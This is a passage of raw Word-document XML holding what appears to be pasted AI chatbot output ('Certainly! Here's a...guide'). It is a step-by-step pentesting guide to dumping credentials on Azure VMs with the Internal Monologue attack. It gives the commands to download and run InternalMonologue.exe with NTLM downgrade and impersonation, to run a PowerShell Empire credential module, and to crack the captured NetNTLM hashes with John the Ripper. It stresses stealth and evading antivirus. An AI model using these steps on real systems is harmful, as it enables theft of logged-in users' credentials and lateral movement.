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C9E34" w14:textId="77777777" w:rsidR="003D399A" w:rsidRDefault="003D399A" w:rsidP="003D399A"/>
    <w:p w14:paraId="666E349D" w14:textId="4711D739" w:rsidR="003D399A" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc221397415"/>
      <w:r>
        <w:t xml:space="preserve">Credential dumping </w:t>
      </w:r>
      <w:r>
        <w:t>with Internal Monologue</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="2CE55177" w14:textId="77777777" w:rsidR="003D399A" w:rsidRDefault="003D399A" w:rsidP="003D399A"/>
    <w:p w14:paraId="74730151" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r w:rsidRPr="0015249B">
        <w:t xml:space="preserve">Certainly! Here's a </w:t>
      </w:r>
      <w:r w:rsidRPr="0015249B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>corrected, summarized, and detailed step-by-step guide</w:t>
      </w:r>
      <w:r w:rsidRPr="0015249B">
        <w:t xml:space="preserve"> for performing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0015249B">
        <w:t>pentesting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0015249B">
        <w:t xml:space="preserve"> on Azure Windows/Linux VMs targeting </w:t>
      </w:r>
      <w:r w:rsidRPr="0015249B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Local accounts, AD accounts, and Microsoft Entra ID accounts</w:t>
      </w:r>
      <w:r w:rsidRPr="0015249B">
        <w:t xml:space="preserve"> using the </w:t>
      </w:r>
      <w:r w:rsidRPr="0015249B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Internal Monologue attack</w:t>
      </w:r>
      <w:r w:rsidRPr="0015249B">
        <w:t xml:space="preserve"> (credential dumping without </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0015249B">
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0015249B">
        <w:t>), including commands, exploitation steps, vulnerabilities exploited, and all necessary details — duplicates removed and clarity improved:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B067E61" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r>
        <w:pict w14:anchorId="6B4A64B4">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="432B361D" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0015249B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pentesting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0015249B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Azure VMs: Credential Dumping Using Internal Monologue Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC7DF82" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0015249B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD66A6C" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0015249B">
        <w:t xml:space="preserve">Traditional credential dumping tools like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0015249B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0015249B">
        <w:t xml:space="preserve"> are often detected by antivirus and endpoint protection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BD9629" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0015249B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Internal Monologue</w:t>
      </w:r>
      <w:r w:rsidRPr="0015249B">
        <w:t xml:space="preserve"> attack offers a stealthier way to extract </w:t>
      </w:r>
      <w:r w:rsidRPr="0015249B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NetNTLMv1/v2 hashes</w:t>
      </w:r>
      <w:r w:rsidRPr="0015249B">
        <w:t xml:space="preserve"> without dropping suspicious tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65369682" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0015249B">
        <w:t xml:space="preserve">The attack abuses Windows authentication mechanisms by </w:t>
      </w:r>
      <w:r w:rsidRPr="0015249B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>downgrading NTLM authentication</w:t>
      </w:r>
      <w:r w:rsidRPr="0015249B">
        <w:t xml:space="preserve"> and extracting challenge-response hashes from local logon sessions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A38DD7A" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0015249B">
        <w:t>These hashes can be cracked offline or used directly for lateral movement (Pass-the-Hash).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729592DE" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0015249B">
        <w:t>Particularly relevant in Azure environments where Windows VMs may expose legacy authentication or weak NTLM configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F305119" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r>
        <w:pict w14:anchorId="20063D56">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA40F10" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0015249B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Background: What is Internal Monologue?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE2B0B4" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0015249B">
        <w:t xml:space="preserve">Windows uses </w:t>
      </w:r>
      <w:r w:rsidRPr="0015249B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NTLM</w:t>
      </w:r>
      <w:r w:rsidRPr="0015249B">
        <w:t xml:space="preserve"> protocol where servers issue an 8-byte challenge and the client responds with a hash based on the user's password (MD4 hash).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A1C5B4" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0015249B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NetNTLMv1</w:t>
      </w:r>
      <w:r w:rsidRPr="0015249B">
        <w:t xml:space="preserve"> is outdated and vulnerable; often disabled but can be </w:t>
      </w:r>
      <w:r w:rsidRPr="0015249B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>downgraded by attacker manipulation</w:t>
      </w:r>
      <w:r w:rsidRPr="0015249B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472A5BD6" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0015249B">
        <w:t xml:space="preserve">Internal Monologue </w:t>
      </w:r>
      <w:r w:rsidRPr="0015249B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>invokes local NTLM authentication APIs</w:t>
      </w:r>
      <w:r w:rsidRPr="0015249B">
        <w:t xml:space="preserve"> to capture these challenge-response hashes </w:t>
      </w:r>
      <w:r w:rsidRPr="0015249B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>without network interaction</w:t>
      </w:r>
      <w:r w:rsidRPr="0015249B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F120B97" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0015249B">
        <w:t xml:space="preserve">It also temporarily </w:t>
      </w:r>
      <w:r w:rsidRPr="0015249B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">modifies registry keys (e.g., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0015249B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LMCompatibilityLevel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0015249B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="0015249B">
        <w:t xml:space="preserve"> to enable downgraded NTLM communication locally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32537A72" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0015249B">
        <w:t>Hashes extracted represent credentials of currently logged-in users on the compromised host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478D320B" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r>
        <w:pict w14:anchorId="2A6BCE1B">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC5A68B" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0015249B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploitation Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F92CE1B" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0015249B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 1: Obtain Foothold on Azure VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF9B0B5" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0015249B">
        <w:t>The attacker must already have some form of remote code execution or access on the target VM (local admin, remote shell, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFCF3DB" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0015249B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2: Transfer or Invoke </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0015249B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>InternalMonologue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0015249B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49240C2C" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0015249B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Option A: Using the precompiled executable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F3D851" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0015249B">
        <w:t>Download from GitHub or trusted repository.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BE5738" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0015249B">
        <w:t>Transfer InternalMonologue.exe to the Azure VM (e.g., via SCP, SMB share, or Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0015249B">
        <w:t>WebRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0015249B">
        <w:t xml:space="preserve"> in PowerShell).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4824D73C" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r w:rsidRPr="0015249B">
        <w:t># Example PowerShell command to download</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4861F51C" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r w:rsidRPr="0015249B">
        <w:t>Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0015249B">
        <w:t>WebRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0015249B">
        <w:t xml:space="preserve"> -Uri "https://github.com/.../InternalMonologue.exe" -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0015249B">
        <w:t>OutFile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0015249B">
        <w:t xml:space="preserve"> "C:\Temp\InternalMonologue.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7105049E" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0015249B">
        <w:lastRenderedPageBreak/>
        <w:t>Run the executable with parameters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688F0C3E" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r w:rsidRPr="0015249B">
        <w:t>InternalMonologue.exe -Downgrade true -Threads true -Impersonate true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D5A7A0" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0015249B">
        <w:t>This will:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698C7DB0" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0015249B">
        <w:t>Downgrade NTLM version to vulnerable v1 locally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBEBD9A" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0015249B">
        <w:t>Use multiple threads for performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297C8FAB" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0015249B">
        <w:t xml:space="preserve">Impersonate logged-on users to extract their </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0015249B">
        <w:t>NetNTLM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0015249B">
        <w:t xml:space="preserve"> hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA05AFB" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0015249B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Option B: Using PowerShell Empire module (stealthier)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CF0A13" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0015249B">
        <w:t xml:space="preserve">If you have a </w:t>
      </w:r>
      <w:r w:rsidRPr="0015249B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PowerShell Empire</w:t>
      </w:r>
      <w:r w:rsidRPr="0015249B">
        <w:t xml:space="preserve"> agent on the target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C27243" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0015249B">
        <w:t>usemodule</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0015249B">
        <w:t xml:space="preserve"> credentials/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0015249B">
        <w:t>invoke_internal_monologue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3FA65BBE" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r w:rsidRPr="0015249B">
        <w:t>execute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1A54F9" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0015249B">
        <w:t>This avoids transferring any binary, reducing detection risks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493AC333" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r>
        <w:pict w14:anchorId="04CEAEB0">
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5F6759" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0015249B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3: Capture the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0015249B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NetNTLM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0015249B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0CA9C8" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0015249B">
        <w:t>The tool outputs hashes for currently logged-in users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DA3F96" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0015249B">
        <w:t>Example captured hash for user raj:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C646D7" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r w:rsidRPr="0015249B">
        <w:t>raj:NetNTLMv1/v2 Hash...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55988EC8" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r>
        <w:pict w14:anchorId="0810575B">
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AA5EFA" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0015249B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 4: Crack the Hash Offline (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0A923C" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0015249B">
        <w:t>Save the extracted hash to a file on your attacking machine, e.g., hash.txt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F98D379" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r w:rsidRPr="0015249B">
        <w:t>echo "&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0015249B">
        <w:t>captured_hash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0015249B">
        <w:t>&gt;" &gt; hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F5B455" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0015249B">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="0015249B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>John the Ripper</w:t>
      </w:r>
      <w:r w:rsidRPr="0015249B">
        <w:t xml:space="preserve"> to crack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0113DF99" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r w:rsidRPr="0015249B">
        <w:t>john --format=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0015249B">
        <w:t>netntlm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0015249B">
        <w:t xml:space="preserve"> hash.txt --show</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7275A554" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0015249B">
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265482ED" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r w:rsidRPr="0015249B">
        <w:t>raj:123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132F8369" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r>
        <w:pict w14:anchorId="75F3E11F">
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
